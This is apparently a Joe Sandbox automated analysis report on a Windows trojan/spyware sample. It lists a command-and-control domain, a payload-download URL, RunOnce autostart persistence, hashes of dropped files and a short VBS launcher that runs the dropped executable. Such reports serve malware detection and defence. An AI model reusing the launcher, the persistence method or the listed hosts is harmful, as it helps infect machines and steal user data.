23.2.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1116590	Download File
9.0.g4FtSOZMD9.exe.400000.3.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
22.2.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1116590	Download File
22.0.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
9.0.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
0.2.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
9.0.g4FtSOZMD9.exe.400000.1.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
23.0.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.imvu.comr	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	URL Reputation	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	URL Reputation	safe
nhtaxfilling.ddnsgeek.com	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://ns.adobe.c/g?	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	URL Reputation	safe
http://147.189.137.168/1040_RyQoPlW98.bin	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	0%	URL Reputation	safe
http://147.189.137.168/1040_RyQoPlW98.bin~:	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt	0%	URL Reputation	safe
http://crl.pki.goog/GTSGIAG3.crl0	0%	URL Reputation	safe
https://logincdn.msauth.net/16.000.28230.00/MeControl.js	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nhtaxfilling.ddnsgeek.com	207.32.218.236	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nhtaxfilling.ddnsgeek.com	true	Avira URL Cloud: safe	unknown
http://147.189.137.168/1040_RyQoPlW98.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/folder-applications.svg	bhvFAB7.tmp.21.dr	false		high
http://www.imvu.comr	g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/css/main.v2.min.css	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg	bhvFAB7.tmp.21.dr	false		high
http://www.msn.com	bhvFAB7.tmp.21.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
http://google.com/chrome	bhvFAB7.tmp.21.dr	false		high
https://contextual.media.net/__media__/js/util/nrrV9140.js	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/chrome-logo.svg	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_features.png	bhvFAB7.tmp.21.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/	bhvFAB7.tmp.21.dr	false		high
https://www.google.com	g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	bhvFAB7.tmp.21.dr	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg	bhvFAB7.tmp.21.dr	false		high
http://www.msn.com/?ocid=iehp	bhvFAB7.tmp.21.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	bhvFAB7.tmp.21.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/icon-announcement.svg	bhvFAB7.tmp.21.dr	false		high
http://www.nirsoft.net/	g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png	bhvFAB7.tmp.21.dr	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	bhvFAB7.tmp.21.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/css/main.v3.min.css	bhvFAB7.tmp.21.dr	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/application/x-msdownloadC:	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg	bhvFAB7.tmp.21.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	bhvFAB7.tmp.21.dr	false		high
http://www.imvu.com	g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp	false		high
https://www.google.com/chrome/static/images/download-browser/pixel_phone.png	bhvFAB7.tmp.21.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	bhvFAB7.tmp.21.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex	g4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmp	false		high
https://www.google.com/chrome/static/images/app-store-download.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png	bhvFAB7.tmp.21.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	bhvFAB7.tmp.21.dr	false		high
https://contextual.media.net/	bhvFAB7.tmp.21.dr	false		high
https://pki.goog/repository/0	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn	bhvFAB7.tmp.21.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	bhvFAB7.tmp.21.dr	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	bhvFAB7.tmp.21.dr	false		high
http://www.msn.com/	bhvFAB7.tmp.21.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg	bhvFAB7.tmp.21.dr	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	bhvFAB7.tmp.21.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	bhvFAB7.tmp.21.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/48/nrrV18753.js	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-help.jpg	bhvFAB7.tmp.21.dr	false		high
https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/accounts/servicelogin	g4FtSOZMD9.exe	false		high
https://www.google.com/chrome/static/images/homepage/google-enterprise.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-dev.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json	bhvFAB7.tmp.21.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://www.google.com/	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-fb.jpg	bhvFAB7.tmp.21.dr	false		high
http://ns.adobe.c/g?	g4FtSOZMD9.exe, 00000009.00000003.577311939.0000000020E52000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.624858543.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.596412607.0000000020E50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.577281474.0000000020E41000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/mac-ico.png	bhvFAB7.tmp.21.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/google-play-download.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/chrome_throbber_fast.gif	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-canary.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	bhvFAB7.tmp.21.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	bhvFAB7.tmp.21.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png	bhvFAB7.tmp.21.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/laptop_desktop.png	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/js/main.v2.min.js	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg	bhvFAB7.tmp.21.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	bhvFAB7.tmp.21.dr	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_privacy.png	bhvFAB7.tmp.21.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	bhvFAB7.tmp.21.dr	false		high
http://147.189.137.168/1040_RyQoPlW98.bin~:	g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg	bhvFAB7.tmp.21.dr	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE	bhvFAB7.tmp.21.dr	false		high
https://login.yahoo.com/config/login	g4FtSOZMD9.exe	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	bhvFAB7.tmp.21.dr	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M	bhvFAB7.tmp.21.dr	false	Avira URL Cloud: safe	unknown
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/images/cursor-replay.cur	bhvFAB7.tmp.21.dr	false		high
https://www.google.com/chrome/static/js/installer.min.js	bhvFAB7.tmp.21.dr	false		high
http://crl.pki.goog/GTSGIAG3.crl0	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown
https://logincdn.msauth.net/16.000.28230.00/MeControl.js	bhvFAB7.tmp.21.dr	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.189.137.168	unknown	United Kingdom		786	JANETJiscServicesLimitedGB	true
207.32.218.236	nhtaxfilling.ddnsgeek.com	United States		14315	1GSERVERSUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	547022
Start date:	02.01.2022
Start time:	02:25:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	g4FtSOZMD9 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@11/24@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 19% (good quality ratio 16.8%) Quality average: 68.6% Quality standard deviation: 34.1%
HCA Information:	Successful, ratio: 73% Number of executed functions: 118 Number of non-executed functions: 338
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.127.240.158, 51.104.136.2, 204.79.197.200, 13.107.21.200 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:27:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
02:27:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
02:28:04	API Interceptor	17x Sleep call for process: g4FtSOZMD9.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
JANETJiscServicesLimitedGB	SecuriteInfo.com.Linux.BackDoor.Tsunami.970.3006.9678	Get hash	malicious	Browse	136.148.86.78
	phantom.arm	Get hash	malicious	Browse	164.11.141.234
	sora.arm7	Get hash	malicious	Browse	144.32.169.21
	JCvc2tBOvA	Get hash	malicious	Browse	158.94.247.43
	gx86	Get hash	malicious	Browse	143.53.178.113
	7ega.arm	Get hash	malicious	Browse	130.247.180.144
	7ega.arm7	Get hash	malicious	Browse	146.227.250.174
	AtL8HE7Tw3	Get hash	malicious	Browse	137.223.123.160
	Fourloko.x86-20211230-1450	Get hash	malicious	Browse	163.168.3.227
	loligang.arm	Get hash	malicious	Browse	148.93.166.41
	arm7	Get hash	malicious	Browse	137.44.38.16
	xNNBS6ztYT	Get hash	malicious	Browse	131.251.202.75
	mblEcYJR5z	Get hash	malicious	Browse	138.39.96.187
	2LN5DN910q	Get hash	malicious	Browse	138.38.70.123
	bLPohSJ13D	Get hash	malicious	Browse	143.167.61.225
	3M3XmlEQJ3	Get hash	malicious	Browse	138.253.55.36
	L1Ooov6iOC	Get hash	malicious	Browse	146.176.208.168
	x86-20211227-1850	Get hash	malicious	Browse	148.79.152.81
	x86	Get hash	malicious	Browse	144.124.196.35
	teuS3WQvbS	Get hash	malicious	Browse	143.211.236.46
1GSERVERSUS	YnkMPfqr6x.exe	Get hash	malicious	Browse	142.202.242.172
	VrAIZs3uzG.exe	Get hash	malicious	Browse	142.202.242.172
	f0a8d8c69c9fe2352c6569f9973487aed35d6961799d4.exe	Get hash	malicious	Browse	142.202.242.172
	7B10a29MAZ.exe	Get hash	malicious	Browse	142.202.242.172
	SSH	Get hash	malicious	Browse	207.32.216.53
	QYk7iL8OdG.exe	Get hash	malicious	Browse	207.32.217.77
	ENYXDAA75833.vbs	Get hash	malicious	Browse	207.32.219.80
	QQBGV828134.VBS	Get hash	malicious	Browse	142.202.240.53
	HCLGT440605.VBS	Get hash	malicious	Browse	142.202.240.53
	ZNavmXGfEf.exe	Get hash	malicious	Browse	207.32.217.77
	FZWBO074875.VBS	Get hash	malicious	Browse	142.202.240.53
	TNMDE081593.VBS	Get hash	malicious	Browse	142.202.240.53
	R4R47xdsGo.exe	Get hash	malicious	Browse	207.32.217.185
	XGTLKJHM.vbs	Get hash	malicious	Browse	207.32.218.4
	GAWEVQV50254.vbs	Get hash	malicious	Browse	142.202.240.153
	avocFyG.vbs	Get hash	malicious	Browse	207.32.218.40
	DZCNWFE59539.vbs	Get hash	malicious	Browse	142.202.240.153
	ATGSVCN64670.pdf.vbs	Get hash	malicious	Browse	207.32.219.77
	ACUEAQN44306.pdf.vbs	Get hash	malicious	Browse	207.32.219.77
	JOJLKD8241.vbs	Get hash	malicious	Browse	142.202.240.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258048
Entropy (8bit):	5.878526280109068
Encrypted:	false
SSDEEP:	3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
MD5:	81F377EDA4163DA1B74CAE83E38CED9F
SHA1:	E50ABAF01A9FD3AE8176B5B6117F6B8F8A355EC0
SHA-256:	A16D035CA37DBD7AB34C856F4CDF96A9898DCEBBA08C5801C99F3D3100AE6B3F
SHA-512:	8FD4613830195A00650386E450E72081546603DE6FDFF40CA039464CB5D33FD0D2AED0151C6F40558671D631C132F99A5400D9A2DB304AAC05729B941C40A63D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L....6.Y..........................................@.................................<...........................................(...........................................................................(... ....................................text...D........................... ..`.data...P...........................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.890716777636802
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRDN+E2J5xAIcP0WHBW73zx1dAHMn:jFqhv9IN723fOJYxXiMn
MD5:	78974D0D4A018D52ECAC4581F08C3097
SHA1:	B58E51F273A55F0E72AD3066E62E385A7510C116
SHA-256:	91FA3C53A959A83B7FBC297A73221AFE509270F1BA0568B05B857C094696DF41
SHA-512:	AA2256B9844FF038670652CC17DCBB71B6EA89DFA356CDAE44C29E5EC203C3B7907815EDF909D13CE4A7C084ECC4B7BAA6D37E125B3EA950F673EC75B5781FA4
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe")

C:\Users\user\AppData\Local\Temp\bhvFAB7.tmp Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x1277828c, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9105350923938392
Encrypted:	false
SSDEEP:	24576:yHzZ+wP17f2s1ipPHihgmKdTnjVccgeTaNXvq:yHQswtT0q
MD5:	9D77F4E097E9A402A4E80E3633A107BA
SHA1:	CB2A59166D899060B160A4E57E902688CE8CB723
SHA-256:	E198962017B72E47DF7BB8C40BB28CBB9289051B6B0A0AA5EB9CBB778D3ACF4E
SHA-512:	0C2313F5A67A079A61B335F8483B329C3D2FAB576F728F1DBB5CC650F17C9918BE11CDAF7685D173088C0A5C50DEB16165846C8C66478F0142254BC8C6041BAD
Malicious:	false
Reputation:	low
Preview:	.w..... .......p........Ef..4...w........................%..........xA......zw.h.'............................W.4...w..............................................................................................[............B.................................................................................................................. ............zU.........................................................................................................................................................................................................................................7....z.q....................)....z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMP Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.966668453944976
Encrypted:	false
SSDEEP:	768:hlDqxNQ65JJT1coaPeybSF3SjNrb40nEPnngv8K7e:h2v53YPey2xSVb40nE/ngv8K7e
MD5:	30022F5F6D4029602D8AE6CEC49C635A
SHA1:	3370081AEE760B36D2EB4FD2DA7FB0383DFB0BF7
SHA-256:	31F023214DFD6343171820FB95CE4CDBFFF731262EA30C7E19B627981E4B0685
SHA-512:	D93BC21F9336819FFD1D4D913C50C7A6041824F7DB33C3E4875620357A953864306C10817094DB22768BF872806B1A1CFD81ABAE2DD482789A729FBD2B7D3EC6
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Clock\logs.dat Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	data
Category:	dropped
Size (bytes):	184
Entropy (8bit):	6.922859102725601
Encrypted:	false
SSDEEP:	3:z3qdECGmn6eplif1Fycug6718QzafFgfoUzf8E+T1tZno+HQpBLwdGiYdm:EZ6e7itW10fSfow8E+THc+
MD5:	BD21E7F3ACACFEF0FC32FF4CC5894C68
SHA1:	2D273E62F2C9E494D88898724E75C50031657CD4
SHA-256:	FAA6C759F4B7F528E50D1FDEDDF275BC3FE1B7DC83E3435EC8559A55760C25C4
SHA-512:	064D8EFAEC2AF4D29ACF936D758B7C8124C7D140B16AA09F9692F2A208A6B5C128AFDA96A95B7B152C6F964874EBE66F54C3954DE230BCCCF0B89ADD62DBF022
Malicious:	false
Reputation:	low
Preview:	r(..0z...5...M.?<8i.^..`...BE@.......b.2Ci.N.-.K_..l....3..$..j.....:....1..\|...^.Xx.\|..V{.q'....`..v......+#.R.!c..z........h>.... \|.<nv...$..\.].].....;s .%8...<D..`?=.

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_022802.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805509
Entropy (8bit):	7.953635790065994
Encrypted:	false
SSDEEP:	12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
MD5:	4334E5318C03DFED4F6E16D617A0070E
SHA1:	6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
SHA-256:	AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
